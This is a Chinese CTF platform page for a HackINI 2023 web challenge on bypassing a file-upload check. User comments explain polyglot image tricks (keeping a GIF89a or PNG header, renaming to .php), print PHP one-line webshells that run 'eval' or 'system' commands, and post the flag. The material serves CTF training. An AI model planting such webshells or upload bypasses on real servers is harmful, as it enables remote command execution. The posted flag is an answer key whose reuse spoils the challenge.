Upload 1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: 18718578940
一血奖励: 0金币
解  决: 592
提  示:
描  述:
We added a verification. Bypass it. **Author**: souad
评论
ymkiras 2月前

这里可以用qq截图只截1的像素点就可以得到只有字节大小的图片,然后抓包png头不要动,更改文件名变成.php,然后改content-type,然后植入命令内容就跟第一题一样了,PNG头不要动,其他你随便怎么改,改了头大部分情况下就是不安全的

回复 0

MoCaser 2月前

看了wp和评论区,但还是失败了,要么是文件太大要么是图片码被检测出不安全

回复 0

admin9101 7月前

GIF89a <?php system('cat /flag.txt');?>

回复 0

北橘 7月前

shellmates{PoLyg10t_F1l3s_Byp4$S}

回复 0

007 8月前

shellmates{PoLyg10t_F1l3s_Byp4$S}}

回复 0

Garmin 9月前

上传个小图片,上传时用bp抓包加一句话木马再上传即可

回复 0

chouchou 11月前

编写一个php文件 GIF89a <?php echo "<pre>"; system('cat /flag.txt'); echo "</pre>"; #@eval($_POST['s']); ?> 先绕过对php的检查,然后再php中执行shell

回复 0

pb9231 12月前

尝试上传图片文件,发现可以上传(图片要小), 用010 editor 打开图片将php一句话木马<?php @eval($_POST['shell']);?>写入图片末尾,保存后修改图片扩展名为.php 上传图片成功,用蚁剑连接,在根目录下找到flag.txt

回复 0
vanfor 10月前

@TheShy师傅 内容太长了被过滤掉了

回复 0

TheShy师傅 11月前

为什么我一上传就显示页面丢失,什么都不返回给我?无论是什么免杀木马都不行?

回复 0

cqy123 1年前

上传了一个很小的图片,然后抓包,图片内容的头不要动,后面加入一句话木马,乙箭链接

回复 0

.⎛⎝•̀ω•́⎠⎞. 1年前

改改文件头就行

回复 0

WriteUp

image
yangbo

2 金币

评分(1)

解题动态

krioee 攻破了该题 12小时前
冰点泡沫 攻破了该题 1天前
huaji48254 攻破了该题 3天前
whiteshark 攻破了该题 3天前
余长生o 攻破了该题 4天前
llc123 攻破了该题 5天前
3075222650 攻破了该题 8天前
wywitkey 攻破了该题 8天前
senxiang 攻破了该题 9天前
candyshop11 攻破了该题 17天前
ash0x 攻破了该题 17天前
梦游的小狐狸 攻破了该题 19天前
dongwanli 攻破了该题 21天前
戴白帽子的达瓦里希 攻破了该题 21天前
GnawKing 攻破了该题 22天前
xkxtg 攻破了该题 23天前
854396873 攻破了该题 23天前
白露樱希 攻破了该题 24天前
hxnter 攻破了该题 24天前
kk190 攻破了该题 24天前
问题反馈